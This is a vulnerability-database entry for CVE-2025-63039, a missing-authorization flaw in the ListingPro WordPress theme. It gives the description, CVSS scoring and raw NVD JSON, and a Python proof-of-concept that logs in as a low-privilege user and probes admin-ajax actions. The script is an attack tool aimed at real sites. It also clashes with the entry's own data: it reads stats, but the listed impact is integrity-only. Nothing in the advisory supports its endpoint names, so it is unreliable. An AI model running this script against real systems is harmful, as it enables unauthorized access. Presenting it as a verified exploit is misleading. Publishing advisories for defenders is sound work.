Security Vulnerability Report
中文
CVE-2025-63039 CVSS 6.5 MEDIUM

CVE-2025-63039

Published: 2025-12-18 08:16:10
Last Modified: 2026-04-27 19:16:19

Description

Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ListingPro: from n/a through <= 2.9.9.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

ListingPro <= 2.9.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63039 PoC - ListingPro Theme Broken Access Control # This PoC demonstrates accessing admin functions with low-privilege user import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_user" PASSWORD = "user_password" def exploit_missing_auth(): """Exploit the missing authorization vulnerability in ListingPro theme""" session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Login successful with low-privilege account") # Step 2: Access admin functions (requires admin privileges) # This should fail for low-privilege users, but vulnerability allows access admin_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php?action=listingpro_get_stats", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=lp_dashboard_stats", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=listingpro_get_reports" ] for endpoint in admin_endpoints: response = session.get(endpoint) if response.status_code == 200: print(f"[+] Vulnerable endpoint accessible: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True if __name__ == "__main__": exploit_missing_auth()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63039", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:09.987", "lastModified": "2026-04-27T19:16:19.280", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ListingPro: from n/a through <= 2.9.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-9-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}